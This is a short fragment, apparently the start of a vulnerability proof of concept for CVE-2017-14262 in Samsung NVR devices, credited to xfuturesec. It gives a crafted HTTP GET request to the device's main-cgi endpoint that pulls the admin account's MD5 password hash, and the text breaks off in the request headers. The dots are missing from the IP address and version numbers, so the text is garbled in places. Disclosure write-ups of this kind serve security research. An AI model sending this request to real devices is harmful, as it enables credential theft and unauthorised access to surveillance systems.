Samsung_NVR_vul CVE-2017-14262 xfuturesec Co, Ltd First, get the MD5 hash password of the 'admin' account Send: GET 192168114/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/11 Host: 192168114 User-Agent: Mozilla/50 (Windows NT 63; WOW64